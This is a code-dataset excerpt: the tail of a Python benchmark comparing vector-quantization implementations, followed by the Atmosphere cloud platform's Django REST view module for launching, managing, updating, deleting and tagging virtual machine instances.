assert(obs_sh[1] == code_book_sh[1])
assert(obs.typecode() == code_book.typecode())
type = c_spec.num_to_c_types[obs.typecode()]
# band aid for now.
ar_type = 'PyArray_FLOAT'
code = """
#line 83 "vq.py"
// THIS DOES NOT HANDLE STRIDED ARRAYS CORRECTLY
// Surely there is a better way to do this...
PyArrayObject* py_code = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_LONG);
PyArrayObject* py_min_dist = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_FLOAT);
int* raw_code = (int*)(py_code->data);
float* raw_min_dist = (float*)(py_min_dist->data);
%(type)s* raw_obs = obs.data();
%(type)s* raw_code_book = code_book.data();
%(type)s* this_obs = NULL;
%(type)s* this_code = NULL;
int Nfeatures = Nobs[1];
float diff,dist;
for(int i=0; i < Nobs[0]; i++)
{
this_obs = &raw_obs[i*Nfeatures];
raw_min_dist[i] = (%(type)s)10000000.; // big number
for(int j=0; j < Ncode_book[0]; j++)
{
this_code = &raw_code_book[j*Nfeatures];
dist = 0;
for(int k=0; k < Nfeatures; k++)
{
diff = this_obs[k] - this_code[k];
dist += diff*diff;
}
dist = dist;
if (dist < raw_min_dist[i])
{
raw_code[i] = j;
raw_min_dist[i] = dist;
}
}
raw_min_dist[i] = sqrt(raw_min_dist[i]);
}
py::tuple results(2);
results[0] = py_code;
results[1] = py_min_dist;
return_val = results;
""" % locals()
code, distortion = inline_tools.inline(code,['obs','code_book'],
type_converters = blitz_type_converters,
compiler = 'gcc',
verbose = 1)
return code, distortion
def vq3(obs,code_book):
""" Uses standard array conversion completely bi-passing blitz.
THIS DOES NOT HANDLE STRIDED ARRAYS CORRECTLY
"""
# make sure we're looking at arrays.
obs = asarray(obs)
code_book = asarray(code_book)
# check for 2d arrays and compatible sizes.
obs_sh = shape(obs)
code_book_sh = shape(code_book)
assert(len(obs_sh) == 2 and len(code_book_sh) == 2)
assert(obs_sh[1] == code_book_sh[1])
assert(obs.typecode() == code_book.typecode())
type = c_spec.num_to_c_types[obs.typecode()]
code = """
#line 139 "vq.py"
// Surely there is a better way to do this...
PyArrayObject* py_code = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_LONG);
PyArrayObject* py_min_dist = (PyArrayObject*) PyArray_FromDims(1,&Nobs[0],PyArray_FLOAT);
int* code_data = (int*)(py_code->data);
float* min_dist_data = (float*)(py_min_dist->data);
%(type)s* this_obs = NULL;
%(type)s* this_code = NULL;
int Nfeatures = Nobs[1];
float diff,dist;
for(int i=0; i < Nobs[0]; i++)
{
this_obs = &obs_data[i*Nfeatures];
min_dist_data[i] = (float)10000000.; // big number
for(int j=0; j < Ncode_book[0]; j++)
{
this_code = &code_book_data[j*Nfeatures];
dist = 0;
for(int k=0; k < Nfeatures; k++)
{
diff = this_obs[k] - this_code[k];
dist += diff*diff;
}
if (dist < min_dist_data[i])
{
code_data[i] = j;
min_dist_data[i] = dist;
}
}
min_dist_data[i] = sqrt(min_dist_data[i]);
}
py::tuple results(2);
results[0] = py_code;
results[1] = py_min_dist;
return_val = results;
""" % locals()
# this is an unpleasant way to specify type factories -- work on it.
import ext_tools
code, distortion = inline_tools.inline(code,['obs','code_book'])
return code, distortion
import time
import RandomArray
def compare(m,Nobs,Ncodes,Nfeatures):
obs = RandomArray.normal(0.,1.,(Nobs,Nfeatures))
codes = RandomArray.normal(0.,1.,(Ncodes,Nfeatures))
import scipy.cluster.vq
scipy.cluster.vq
print('vq with %d observation, %d features and %d codes for %d iterations' % \
(Nobs,Nfeatures,Ncodes,m))
t1 = time.time()
for i in range(m):
code,dist = scipy.cluster.vq.py_vq(obs,codes)
t2 = time.time()
py = (t2-t1)
print(' speed in python:', (t2 - t1)/m)
print(code[:2],dist[:2])
t1 = time.time()
for i in range(m):
code,dist = scipy.cluster.vq.vq(obs,codes)
t2 = time.time()
print(' speed in standard c:', (t2 - t1)/m)
print(code[:2],dist[:2])
print(' speed up: %3.2f' % (py/(t2-t1)))
# load into cache
b = vq(obs,codes)
t1 = time.time()
for i in range(m):
code,dist = vq(obs,codes)
t2 = time.time()
print(' speed inline/blitz:',(t2 - t1)/ m)
print(code[:2],dist[:2])
print(' speed up: %3.2f' % (py/(t2-t1)))
# load into cache
b = vq2(obs,codes)
t1 = time.time()
for i in range(m):
code,dist = vq2(obs,codes)
t2 = time.time()
print(' speed inline/blitz2:',(t2 - t1)/ m)
print(code[:2],dist[:2])
print(' speed up: %3.2f' % (py/(t2-t1)))
# load into cache
b = vq3(obs,codes)
t1 = time.time()
for i in range(m):
code,dist = vq3(obs,codes)
t2 = time.time()
print(' speed using C arrays:',(t2 - t1)/ m)
print(code[:2],dist[:2])
print(' speed up: %3.2f' % (py/(t2-t1)))
if __name__ == "__main__":
compare(100,1000,30,10)
#compare(1,10,2,10)
| 37.437751 | 105 | 0.528213 |
9f80cb05653257b69e22da09a62518cede6d3434 | 40,057 | py | Python | api/v1/views/instance.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v1/views/instance.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | api/v1/views/instance.py | xuhang57/atmosphere | f53fea2a74ee89ccc8852906799b1d9a7e9178b7 | [
"BSD-3-Clause"
] | null | null | null | from django.utils import timezone
from django.db.models import Q
from rest_framework import status
from rest_framework.response import Response
from threepio import logger
from core.exceptions import ProviderNotActive
from core.models import AtmosphereUser as User
from core.models.allocation_source import AllocationSource
from core.models.identity import Identity
from core.models.instance import convert_esh_instance
from core.models.instance import Instance as CoreInstance
from core.models.boot_script import _save_scripts_to_instance
from core.models.tag import Tag as CoreTag
from core.models.provider import Provider
from service import task
from service.cache import get_cached_instances,\
invalidate_cached_instances
from service.driver import prepare_driver
from service.exceptions import (
OverAllocationError, AllocationBlacklistedError, OverQuotaError,
SizeNotAvailable, HypervisorCapacityError, SecurityGroupNotCreated,
VolumeAttachConflict, VolumeMountConflict, InstanceDoesNotExist,
UnderThresholdError, ActionNotAllowed, Unauthorized,
# Technically owned by another
socket_error, ConnectionFailure, LibcloudInvalidCredsError, LibcloudBadResponseError
)
from service.instance import (
run_instance_action,
launch_instance)
from service.tasks.driver import update_metadata
from api.exceptions import (
failure_response, member_action_forbidden,
invalid_creds, connection_failure, malformed_response)
from api.decorators import emulate_user
from api.exceptions import (
inactive_provider, size_not_available, mount_failed, over_quota,
under_threshold, over_capacity, instance_not_found)
from api.pagination import OptionalPagination
from api.v1.serializers import InstanceStatusHistorySerializer,\
InstanceSerializer, InstanceHistorySerializer, VolumeSerializer,\
TagSerializer
from api.v1.views.base import AuthAPIView, AuthListAPIView
def get_core_instance(request, provider_uuid, identity_uuid, instance_id):
user = request.user
esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
esh_instance = get_esh_instance(request, provider_uuid, identity_uuid,
instance_id)
core_instance = convert_esh_instance(esh_driver, esh_instance,
provider_uuid, identity_uuid, user)
return core_instance
def get_esh_instance(request, provider_uuid, identity_uuid, instance_id):
esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
if not esh_driver:
raise LibcloudInvalidCredsError(
"Provider_uuid && identity_uuid "
"did not produce a valid combination")
esh_instance = None
try:
esh_instance = esh_driver.get_instance(instance_id)
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except LibcloudInvalidCredsError:
return invalid_creds(provider_uuid, identity_uuid)
except Exception as exc:
logger.exception("Encountered a generic exception. "
"Returning 409-CONFLICT")
return failure_response(status.HTTP_409_CONFLICT,
str(exc.message))
if not esh_instance:
# End date everything
try:
core_inst = CoreInstance.objects.get(
provider_alias=instance_id,
source__provider__uuid=provider_uuid,
created_by_identity__uuid=identity_uuid)
core_inst.end_date_all()
except CoreInstance.DoesNotExist:
pass
return esh_instance
class InstanceList(AuthAPIView):
"""
Instances are the objects created when you launch a machine. They are
represented by a unique ID, randomly generated on launch, important
attributes of an Instance are:
Name, Status (building, active, suspended), Size, Machine"""
def get(self, request, provider_uuid, identity_uuid):
"""
Returns a list of all instances
"""
user = request.user
try:
esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
except ProviderNotActive as pna:
return inactive_provider(pna)
except Exception as e:
return failure_response(
status.HTTP_409_CONFLICT,
e.message)
if not esh_driver:
return invalid_creds(provider_uuid, identity_uuid)
identity = Identity.shared_with_user(user).get(uuid=identity_uuid)
try:
esh_instance_list = get_cached_instances(identity=identity)
except LibcloudBadResponseError:
return malformed_response(provider_uuid, identity_uuid)
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except LibcloudInvalidCredsError:
return invalid_creds(provider_uuid, identity_uuid)
core_instance_list = [convert_esh_instance(esh_driver,
inst,
provider_uuid,
identity_uuid,
user)
for inst in esh_instance_list]
# TODO: Core/Auth checks for shared instances
serialized_data = InstanceSerializer(core_instance_list,
context={"request": request},
many=True).data
response = Response(serialized_data)
response['Cache-Control'] = 'no-cache'
return response
def post(self, request, provider_uuid, identity_uuid, format=None):
"""
Instance Class:
Launches an instance based on the params
Returns a single instance
Parameters: machine_alias, size_alias, username
TODO: Create a 'reverse' using the instance-id to pass
the URL for the newly created instance
I.e: url = "/provider/1/instance/1/i-12345678"
"""
data = request.data
user = request.user
# Check the data is valid
missing_keys = valid_post_data(data)
if missing_keys:
return keys_not_found(missing_keys)
identity = Identity.shared_with_user(user, is_leader=True).filter(uuid=identity_uuid).first()
if not identity:
failure_msg = "User %s does not have permission to POST with this identity. Promote user to leader or use a different Identity." % (user,)
return failure_response(status.HTTP_403_FORBIDDEN, failure_msg)
# Pass these as args
size_alias = data.pop("size_alias")
allocation_source_uuid = data.pop("allocation_source_uuid",None)
machine_alias = data.pop("machine_alias")
hypervisor_name = data.pop("hypervisor", None)
if hypervisor_name:
# Previous method passed this with 'None' but that fails now.
# This check will only add the ex_ value if it is 'truthy'.
data['ex_hypervisor_name'] = hypervisor_name
deploy = data.pop("deploy", True)
if type(deploy) in [str, unicode] and deploy.lower() == "false":
deploy = False
elif not isinstance(deploy, bool):
deploy = True
boot_scripts = data.pop("scripts", [])
try:
logger.debug(data)
allocation_source = AllocationSource.objects.get(
uuid=allocation_source_uuid)
core_instance = launch_instance(
user, identity_uuid,
size_alias, machine_alias,
deploy=deploy,
allocation_source=allocation_source,
**data)
except UnderThresholdError as ute:
return under_threshold(ute)
except OverQuotaError as oqe:
return over_quota(oqe)
except OverAllocationError as oae:
return over_quota(oae)
except AllocationBlacklistedError as e:
return failure_response(
status.HTTP_403_FORBIDDEN,
e.message)
except Unauthorized:
return invalid_creds(provider_uuid, identity_uuid)
except SizeNotAvailable as snae:
return size_not_available(snae)
except SecurityGroupNotCreated:
return connection_failure(provider_uuid, identity_uuid)
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except LibcloudInvalidCredsError:
return invalid_creds(provider_uuid, identity_uuid)
except Exception as exc:
logger.exception("Encountered a generic exception. "
"Returning 409-CONFLICT")
return failure_response(status.HTTP_409_CONFLICT,
str(exc.message))
serializer = InstanceSerializer(core_instance,
context={"request": request},
data=data)
if serializer.is_valid():
instance = serializer.save()
if boot_scripts:
_save_scripts_to_instance(instance, boot_scripts)
instance.change_allocation_source(allocation_source)
logger.info("DEBUG- Instance launch completed - Returning instance %s (%s) to user %s" % (instance, instance.created_by_identity, request.user))
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
def _sort_instance_history(history_instance_list, sort_by, descending=False):
# Using the 'sort_by' variable, sort the list:
if not sort_by or 'end_date' in sort_by:
return sorted(history_instance_list, key=lambda ish:
ish.end_date if ish.end_date else timezone.now(),
reverse=descending)
elif 'start_date' in sort_by:
return sorted(history_instance_list, key=lambda ish:
ish.start_date if ish.start_date else timezone.now(),
reverse=descending)
def _filter_instance_history(history_instance_list, params):
# Filter the list based on query strings
for filter_key, value in params.items():
if 'start_date' == filter_key:
history_instance_list = history_instance_list.filter(
start_date__gt=value)
elif 'end_date' == filter_key:
history_instance_list = history_instance_list.filter(
Q(end_date=None) |
Q(end_date__lt=value))
elif 'ip_address' == filter_key:
history_instance_list = history_instance_list.filter(
ip_address__contains=value)
elif 'alias' == filter_key:
history_instance_list = history_instance_list.filter(
provider_alias__contains=value)
return history_instance_list
class InstanceHistory(AuthListAPIView):
"""Instance history for a specific user."""
pagination_class = OptionalPagination
serializer_class = InstanceHistorySerializer
@emulate_user
def get_queryset(self):
"""
Authentication required, Retrieve a list of previously launched
instances.
"""
# List of all instances created by user
sort_by = self.request.query_params.get('sort_by', '')
order_by = self.request.query_params.get('order_by', 'desc')
history_instance_list = CoreInstance.objects.filter(
created_by=self.request.user).order_by("-start_date")
history_instance_list = _filter_instance_history(
history_instance_list, self.request.query_params)
history_instance_list = _sort_instance_history(
history_instance_list, sort_by, 'desc' in order_by.lower())
return history_instance_list
class InstanceHistoryDetail(AuthAPIView):
"""
Instance history for specific instance.
"""
def get(self, request, instance_id):
"""
Authentication required, Retrieve a list of previously launched
instances.
"""
params = request.query_params.copy()
user = User.objects.filter(username=request.user)
if user and len(user) > 0:
user = user[0]
else:
return failure_response(status.HTTP_401_UNAUTHORIZED,
'Request User %s not found' %
user)
emulate_name = params.pop('username', None)
# Support for staff users to emulate a specific user history
if user.is_staff and emulate_name:
emulate_name = emulate_name[0] # Querystring conversion
user = User.objects.filter(username=emulate_name)
if user and len(user) > 0:
user = user[0]
else:
return failure_response(status.HTTP_401_UNAUTHORIZED,
'Emulated User %s not found' %
emulate_name)
# List of all instances matching user, instance_id
core_instance =\
CoreInstance.objects.filter(
created_by=user,
provider_alias=instance_id).order_by("-start_date")
if core_instance and len(core_instance) > 0:
core_instance = core_instance[0]
else:
return failure_response(status.HTTP_401_UNAUTHORIZED,
'Instance %s not found' %
instance_id)
serialized_data = InstanceHistorySerializer(
core_instance,
context={"request": request},
many=True).data
response = Response(serialized_data)
response['Cache-Control'] = 'no-cache'
return response
class InstanceStatusHistoryDetail(AuthAPIView):
"""
List of instance status history for specific instance.
"""
def get(self, request, instance_id):
"""
Authentication required, Retrieve a list of previously launched
instances.
"""
params = request.query_params.copy()
user = User.objects.filter(username=request.user)
if user and len(user) > 0:
user = user[0]
else:
return failure_response(status.HTTP_401_UNAUTHORIZED,
'Request User %s not found' %
user)
emulate_name = params.pop('username', None)
# Support for staff users to emulate a specific user history
if user.is_staff and emulate_name:
emulate_name = emulate_name[0] # Querystring conversion
user = User.objects.filter(username=emulate_name)
if user and len(user) > 0:
user = user[0]
else:
return failure_response(status.HTTP_401_UNAUTHORIZED,
'Emulated User %s not found' %
emulate_name)
# List of all instances matching user, instance_id
core_instance = CoreInstance.objects.filter(
created_by=user,
provider_alias=instance_id).order_by("-start_date")
if core_instance and len(core_instance) > 0:
core_instance = core_instance[0]
else:
return failure_response(status.HTTP_401_UNAUTHORIZED,
'Instance %s not found' %
instance_id)
status_history = core_instance\
.instancestatushistory_set.order_by('start_date')
serialized_data = InstanceStatusHistorySerializer(
status_history, many=True).data
response = Response(serialized_data)
response['Cache-Control'] = 'no-cache'
return response
def _further_process_result(request, action, result):
"""
Provide additional serialization if the `action` has a
`result` requiring processing.
"""
if 'volume' in action:
return VolumeSerializer(result,
context={"request": request}).data
else:
return result
class InstanceAction(AuthAPIView):
"""
This endpoint will allow you to run a specific action on an instance.
The GET method will retrieve all available actions and any parameters
that are required.
The POST method expects DATA: {"action":...}
Returns: 200, data: {'result':'success',...}
On Error, a more specfific message applies.
Data variables:
___
* action - The action you wish to take on your instance
* action_params - any parameters required (as detailed on the api) to
run the requested action.
Instances are the objects created when you launch a machine. They are
represented by a unique ID, randomly generated on launch, important
attributes of an Instance are:
Name, Status (building, active, suspended), Size, Machine
"""
def get(self, request, provider_uuid, identity_uuid, instance_id):
"""Authentication Required, List all available instance actions,
including necessary parameters.
"""
actions = [
{"action": "attach_volume",
"action_params": {
"volume_id": "required",
"device": "optional",
"mount_location": "optional"},
"description": "Attaches the volume <id> to instance"},
{"action": "mount_volume",
"action_params": {
"volume_id": "required",
"device": "optional",
"mount_location": "optional"},
"description": "Unmount the volume <id> from instance"},
{"action": "unmount_volume",
"action_params": {"volume_id": "required"},
"description": "Mount the volume <id> to instance"},
{"action": "detach_volume",
"action_params": {"volume_id": "required"},
"description": "Detaches the volume <id> to instance"},
{"action": "resize",
"action_params": {"size": "required"},
"description": "Resize instance to size <id>"},
{"action": "confirm_resize",
"description": "Confirm the instance works after resize."},
{"action": "revert_resize",
"description": "Revert the instance if resize fails."},
{"action": "suspend",
"description": "Suspend the instance."},
{"action": "resume",
"description": "Resume the instance."},
{"action": "start",
"description": "Start the instance."},
{"action": "stop",
"description": "Stop the instance."},
{"action": "reboot",
"action_params": {"reboot_type (optional)": "SOFT/HARD"},
"description": "Stop the instance."},
{"action": "console",
"description": "Get noVNC Console."}]
response = Response(actions, status=status.HTTP_200_OK)
return response
def post(self, request, provider_uuid, identity_uuid, instance_id):
"""Authentication Required, Attempt a specific instance action,
including necessary parameters.
"""
# Service-specific call to action
action_params = request.data
if not action_params.get('action', None):
return failure_response(
status.HTTP_400_BAD_REQUEST,
'POST request to /action require a BODY with \'action\'.')
result_obj = None
user = request.user
identity = Identity.objects.get(uuid=identity_uuid)
action = action_params['action']
try:
if not can_use_instance(user, instance_id, leader_required=True):
return member_action_forbidden(user.username, "Instance", instance_id)
result_obj = run_instance_action(user, identity, instance_id, action, action_params)
result_obj = _further_process_result(request, action, result_obj)
api_response = {
'result': 'success',
'message': 'The requested action <%s> was run successfully' % (action_params['action'],),
'object': result_obj,
}
response = Response(api_response, status=status.HTTP_200_OK)
return response
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except ProviderNotActive as pna:
return inactive_provider(pna)
except InstanceDoesNotExist as dne:
return failure_response(
status.HTTP_404_NOT_FOUND,
'Instance %s no longer exists' % (instance_id,))
except LibcloudInvalidCredsError:
return invalid_creds(provider_uuid, identity_uuid)
except HypervisorCapacityError as hce:
return over_capacity(hce)
except OverQuotaError as oqe:
return over_quota(oqe)
except OverAllocationError as oae:
return over_quota(oae)
except AllocationBlacklistedError as e:
return failure_response(
status.HTTP_403_FORBIDDEN,
e.message)
except SizeNotAvailable as snae:
return size_not_available(snae)
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except VolumeMountConflict as vmc:
return mount_failed(vmc)
except NotImplemented:
return failure_response(
status.HTTP_409_CONFLICT,
"The requested action %s is not available on this provider."
% action_params['action'])
except ActionNotAllowed:
return failure_response(
status.HTTP_409_CONFLICT,
"The requested action %s has been explicitly "
"disabled on this provider." % action_params['action'])
except Exception as exc:
logger.exception("Exception occurred processing InstanceAction")
message = exc.message
if message.startswith('409 Conflict'):
return failure_response(
status.HTTP_409_CONFLICT,
message)
return failure_response(
status.HTTP_403_FORBIDDEN,
"The requested action %s encountered "
"an irrecoverable exception: %s"
% (action_params['action'], message))
class Instance(AuthAPIView):
"""
Instances are the objects created when you launch a machine. They are
represented by a unique ID, randomly generated on launch, important
attributes of an Instance are:
Name, Status (building, active, suspended), Size, Machine
"""
def get(self, request, provider_uuid, identity_uuid, instance_id):
"""
Authentication Required, get instance details.
"""
user = request.user
# NOTE: This 'Scheme' should be used across
# the ENTIRE API v1 (Machines, Volumes, Sizes)
# NOTE: Especially the part below, where you end date
# all the things that are 'inactive'
try:
provider = Provider.objects.get(uuid=provider_uuid)
if not provider.is_current():
raise ProviderNotActive(provider)
except Provider.DoesNotExist:
return invalid_creds(provider_uuid, identity_uuid)
except ProviderNotActive as pna:
return inactive_provider(pna)
# Cleared provider testing -- ready for driver prep.
try:
esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
if not esh_driver:
return invalid_creds(provider_uuid, identity_uuid)
logger.info("InstanceQuery Looking for %s" % instance_id)
esh_instance = esh_driver.get_instance(instance_id)
logger.info("InstanceQuery Found instance %s" % esh_instance)
except (socket_error, ConnectionFailure):
logger.exception("Connection failure prevented InstanceQuery")
return connection_failure(provider_uuid, identity_uuid)
except LibcloudInvalidCredsError:
logger.exception("Invalid credentialsprevented InstanceQuery")
return invalid_creds(provider_uuid, identity_uuid)
except Exception as exc:
logger.exception("Encountered a generic exception. "
"Returning 409-CONFLICT")
return failure_response(status.HTTP_409_CONFLICT,
str(exc.message))
# NOTE: Especially THIS part below, where you end date all the
# things that are 'inactive'
if not esh_instance:
try:
core_inst = CoreInstance.objects.get(
provider_alias=instance_id,
source__provider__uuid=provider_uuid,
created_by_identity__uuid=identity_uuid)
core_inst.end_date_all()
except CoreInstance.DoesNotExist:
pass
return instance_not_found(instance_id)
core_instance = convert_esh_instance(esh_driver, esh_instance,
provider_uuid, identity_uuid,
user)
serialized_data = InstanceSerializer(
core_instance,
context={"request": request}).data
response = Response(serialized_data)
response['Cache-Control'] = 'no-cache'
return response
def patch(self, request, provider_uuid, identity_uuid, instance_id):
"""Authentication Required, update metadata about the instance"""
user = request.user
data = request.data
esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
if not esh_driver:
return invalid_creds(provider_uuid, identity_uuid)
if not can_use_instance(user, instance_id, leader_required=True):
return member_action_forbidden(user.username, instance_id)
try:
esh_instance = esh_driver.get_instance(instance_id)
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except LibcloudInvalidCredsError:
return invalid_creds(provider_uuid, identity_uuid)
except Exception as exc:
logger.exception("Encountered a generic exception. "
"Returning 409-CONFLICT")
return failure_response(status.HTTP_409_CONFLICT,
str(exc.message))
if not esh_instance:
return instance_not_found(instance_id)
# Gather the DB related item and update
core_instance = convert_esh_instance(esh_driver, esh_instance,
provider_uuid, identity_uuid,
user)
serializer = InstanceSerializer(
core_instance, data=data,
context={"request": request}, partial=True)
identity = Identity.objects.get(uuid=identity_uuid)
provider = identity.provider
if serializer.is_valid():
logger.info('metadata = %s' % data)
driver_class = esh_driver.__class__
update_metadata.s(driver_class, provider, identity, esh_instance.id,
data, replace_metadata=False).apply()
instance = serializer.save()
boot_scripts = data.pop('boot_scripts', [])
if boot_scripts:
_save_scripts_to_instance(instance, boot_scripts)
invalidate_cached_instances(identity=identity)
response = Response(serializer.data)
logger.info('data = %s' % serializer.data)
response['Cache-Control'] = 'no-cache'
return response
else:
return Response(
serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
def put(self, request, provider_uuid, identity_uuid, instance_id):
"""Authentication Required, update metadata about the instance"""
user = request.user
data = request.data
# Ensure item exists on the server first
esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
if not esh_driver:
return invalid_creds(provider_uuid, identity_uuid)
if not can_use_instance(user, instance_id, leader_required=True):
return member_action_forbidden(user.username, instance_id)
try:
esh_instance = esh_driver.get_instance(instance_id)
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except LibcloudInvalidCredsError:
return invalid_creds(provider_uuid, identity_uuid)
except Exception as exc:
logger.exception("Encountered a generic exception. "
"Returning 409-CONFLICT")
return failure_response(status.HTTP_409_CONFLICT,
str(exc.message))
if not esh_instance:
return instance_not_found(instance_id)
# Gather the DB related item and update
core_instance = convert_esh_instance(esh_driver, esh_instance,
provider_uuid, identity_uuid,
user)
serializer = InstanceSerializer(core_instance, data=data,
context={"request": request})
identity = Identity.objects.get(uuid=identity_uuid)
if serializer.is_valid():
logger.info('metadata = %s' % data)
#NOTE: We shouldn't allow 'full replacement' of metadata..
# We should also validate against potentional updating of 'atmo-used metadata'
update_metadata.s(esh_driver.__class__, esh_driver.provider, esh_driver.identity, esh_instance.id,
data, replace_metadata=False).apply()
new_instance = serializer.save()
boot_scripts = data.pop('boot_scripts', [])
if boot_scripts:
new_instance = _save_scripts_to_instance(new_instance,
boot_scripts)
serializer = InstanceSerializer(
new_instance,
context={"request": request})
invalidate_cached_instances(identity=identity)
response = Response(serializer.data)
logger.info('data = %s' % serializer.data)
response['Cache-Control'] = 'no-cache'
return response
else:
return Response(serializer.errors,
status=status.HTTP_400_BAD_REQUEST)
def delete(self, request, provider_uuid, identity_uuid, instance_id):
"""Authentication Required, TERMINATE the instance.
Be careful, there is no going back once you've deleted an instance.
"""
user = request.user
esh_driver = prepare_driver(request, provider_uuid, identity_uuid)
if not esh_driver:
return invalid_creds(provider_uuid, identity_uuid)
if not can_use_instance(user, instance_id, leader_required=True):
return member_action_forbidden(user.username, instance_id)
try:
esh_instance = esh_driver.get_instance(instance_id)
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except LibcloudInvalidCredsError:
return invalid_creds(provider_uuid, identity_uuid)
except Exception as exc:
logger.exception("Encountered a generic exception. "
"Returning 409-CONFLICT")
return failure_response(status.HTTP_409_CONFLICT,
str(exc.message))
try:
# Test that there is not an attached volume BEFORE we destroy
task.destroy_instance_task(user, esh_instance, identity_uuid)
invalidate_cached_instances(
identity=Identity.objects.get(uuid=identity_uuid))
existing_instance = esh_driver.get_instance(instance_id)
except VolumeAttachConflict as exc:
message = exc.message
return failure_response(status.HTTP_409_CONFLICT, message)
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except LibcloudInvalidCredsError:
return invalid_creds(provider_uuid, identity_uuid)
except InstanceDoesNotExist as dne:
return failure_response(
status.HTTP_404_NOT_FOUND,
"Instance %s does not exist" % instance_id)
except Exception as exc:
logger.exception("Encountered a generic exception. "
"Returning 409-CONFLICT")
return failure_response(status.HTTP_409_CONFLICT,
str(exc.message))
try:
core_instance = None
if existing_instance:
# Instance will be deleted soon...
esh_instance = existing_instance
if esh_instance.extra\
and 'task' not in esh_instance.extra:
esh_instance.extra['task'] = 'queueing delete'
core_instance = convert_esh_instance(esh_driver, esh_instance,
provider_uuid, identity_uuid,
user)
if not core_instance:
logger.warn("Unable to find core instance %s." % (instance_id))
core_instance = CoreInstance.objects.filter(
provider_alias=instance_id).first()
serialized_data = InstanceSerializer(
core_instance,
context={"request": request}).data
response = Response(serialized_data, status=status.HTTP_200_OK)
response['Cache-Control'] = 'no-cache'
return response
except (Identity.DoesNotExist) as exc:
return failure_response(status.HTTP_400_BAD_REQUEST,
"Invalid provider_uuid or identity_uuid.")
except (socket_error, ConnectionFailure):
return connection_failure(provider_uuid, identity_uuid)
except LibcloudInvalidCredsError:
return invalid_creds(provider_uuid, identity_uuid)
class InstanceTagList(AuthAPIView):
"""
Tags are a easy way to allow users to group several images as similar
based on a feature/program of the application.
"""
def get(self, request, provider_uuid, identity_uuid, instance_id,
*args, **kwargs):
"""
List all public tags.
"""
core_instance = get_core_instance(request, provider_uuid,
identity_uuid, instance_id)
if not core_instance:
instance_not_found(instance_id)
tags = core_instance.tags.all()
serializer = TagSerializer(tags, many=True)
return Response(serializer.data)
def post(self, request, provider_uuid, identity_uuid, instance_id,
*args, **kwargs):
"""Create a new tag resource
Params:name -- Name of the new Tag
Returns:
Status Code: 201 Body: A new Tag object
Status Code: 400 Body: Errors (Duplicate/Invalid Name)
"""
user = request.user
data = request.data.copy()
if 'name' not in data:
return Response("Missing 'name' in POST data",
status=status.HTTP_400_BAD_REQUEST)
core_instance = get_core_instance(request,
provider_uuid,
identity_uuid,
instance_id)
if not core_instance:
instance_not_found(instance_id)
same_name_tags = CoreTag.objects.filter(name__iexact=data['name'])
if same_name_tags:
add_tag = same_name_tags[0]
else:
data['user'] = user.username
data['name'] = data['name'].lower()
serializer = TagSerializer(data=data)
if not serializer.is_valid():
return Response(
serializer.errors, status=status.HTTP_400_BAD_REQUEST)
add_tag = serializer.save()
core_instance.tags.add(add_tag)
return Response(status=status.HTTP_204_NO_CONTENT)
class InstanceTagDetail(AuthAPIView):
"""
Tags are a easy way to allow users to group several images as similar
based on a feature/program of the application.
This API resource allows you to Retrieve, Update, or Delete your Tag.
"""
def delete(self, request, provider_uuid, identity_uuid, instance_id,
tag_slug, *args, **kwargs):
"""
Remove the tag, if it is no longer in use.
"""
core_instance = get_core_instance(request, provider_uuid,
identity_uuid, instance_id)
if not core_instance:
instance_not_found(instance_id)
try:
tag = core_instance.tags.get(name__iexact=tag_slug)
except CoreTag.DoesNotExist:
return failure_response(
status.HTTP_404_NOT_FOUND,
'Tag %s not found on instance' % tag_slug)
core_instance.tags.remove(tag)
return Response(status=status.HTTP_204_NO_CONTENT)
def get(self, request, provider_uuid, identity_uuid, instance_id,
tag_slug, *args, **kwargs):
"""
Return the credential information for this tag
"""
try:
core_instance = get_core_instance(request, provider_uuid,
identity_uuid, instance_id)
except ProviderNotActive as pna:
return inactive_provider(pna)
except Exception as e:
return failure_response(
status.HTTP_409_CONFLICT,
e.message)
if not core_instance:
instance_not_found(instance_id)
try:
tag = core_instance.tags.get(name__iexact=tag_slug)
except CoreTag.DoesNotExist:
return Response(['Tag does not exist'],
status=status.HTTP_404_NOT_FOUND)
serializer = TagSerializer(tag)
return Response(serializer.data)
def valid_post_data(data):
"""
Return any missing required post key names.
"""
required = ['machine_alias', 'size_alias', 'name']
return [key for key in required
if key not in data or
(isinstance(data[key], str) and len(data[key]) > 0)]
def can_use_instance(user, instance_id, leader_required=False):
"""
determine if the user is allowed to act on this instance.
Optionally, if leadership is required, test for it.
"""
if leader_required:
instance_qs = CoreInstance.shared_with_user(user, is_leader=True)
else:
instance_qs = CoreInstance.shared_with_user(user)
return instance_qs.filter(provider_alias=instance_id).exists()
def keys_not_found(missing_keys):
return failure_response(
status.HTTP_400_BAD_REQUEST,
'Missing data for variable(s): %s' % missing_keys)
| 43.118407 | 156 | 0.614599 |
